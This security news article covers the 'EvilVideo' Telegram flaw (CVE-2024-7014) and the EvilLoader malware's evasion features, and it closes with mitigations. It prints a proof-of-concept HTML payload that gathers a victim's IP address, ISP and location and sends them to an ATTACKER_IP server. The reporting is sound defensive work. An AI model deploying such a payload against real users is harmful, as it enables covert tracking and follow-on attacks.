A newly documented exploitation technique targeting Telegram’s file-sharing infrastructure has raised alarms in cybersecurity circles.
Dubbed “EvilVideo,” this attack vector leverages a vulnerability (CVE-2024-7014) in how Telegram processes multimedia content, enabling attackers to disguise malicious HTML files as video files.
When unsuspecting users attempt to open these files, embedded JavaScript code executes, enabling IP logging, device fingerprinting, and secondary payload delivery.
.png
)
Technical Breakdown of the EvilVideo Exploit
The vulnerability stems from inconsistencies in Telegram’s file-type validation mechanisms. Attackers craft an .htm file containing JavaScript payloads, rename it with an .mp4 extension, and distribute it via Telegram’s API.
When a recipient opens the file, Android’s content provider system parses the URI as content://org.telegram.messenger.provider/media/…, triggering the default browser to render the HTML/JavaScript content rather than a video player.
Weaponized HTML Payload
As per a Cti Monster’s report, The malicious HTML employs browser-based scripting to extract sensitive system and network data.
As demonstrated in the proof-of-concept code below, attackers leverage the fetch API to collect IP geolocation details and exfiltrate them to a command-and-control server:
<!DOCTYPE html>
<html>
<head>
<script>
fetch('http://ip-api.com/json')
.then(response => response.json())
.then(data => {
fetch('http://ATTACKER_IP:5000/log_ip', {
method: 'POST',
body: JSON.stringify({
ip: data.query,
isp: data.isp,
location: `${data.city}, ${data.country}`
})
});
});
</script>
</head>
<body></body>
</html>This script harvests the victim’s public IP address, ISP, and geographical coordinates, providing attackers with critical intelligence for follow-on attacks.
EvilLoader Module: Enhanced Anti-Analysis Capabilities
Recent updates to the EvilLoader malware-as-a-service (MaaS) platform incorporate sophisticated anti-analysis checks to evade detection. The module now performs:
- Sandbox Detection: Checks for virtualized environments using RAM, CPU core, and screen-resolution heuristics.
- Debugger Evasion: Monitors for debugging tools like Frida or Xposed framework.
- Geofencing: Blocks execution in regions irrelevant to the attacker’s objectives.
These enhancements complicate reverse engineering and allow attackers to deploy secondary payloads—such as fake “Play Protect” warnings—that trick users into disabling security protocols.
The video below shows how “malware and ip logger” scenarios are carried out:
Attack Lifecycle and User Impact
- Lure Distribution: Attackers send the malicious .htm file via Telegram, masquerading as a video (e.g., 4_5924894289476721732.mp4).
- File Execution: The victim attempts to open the file, prompting the browser to render the HTML.
- IP Exfiltration: JavaScript collects network data and transmits it to the attacker’s server.
- Payload Delivery: Victims are redirected to phishing pages hosting malware downloads disguised as security updates.
Mitigation Strategies
- User Vigilance: Avoid opening unsolicited “video” files from unknown senders. Verify file extensions before execution.
- Network Monitoring: Deploy intrusion detection systems (IDS) to flag anomalous outbound traffic to IP geolocation APIs.
- Developer Action: Telegram must enforce stricter MIME-type validation and implement file-content scanning for API-uploaded media.
The EvilVideo exploit underscores the blurred line between file types and execution contexts in modern apps.
As attackers refine content-disguise techniques, users and developers alike must adopt proactive security postures—validating file integrity, updating software regularly, and educating on emerging social engineering tactics.
With CVE-2024-7014 highlighting Telegram’s vulnerability landscape, platform-wide security audits remain imperative to mitigate similar threats.
Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free
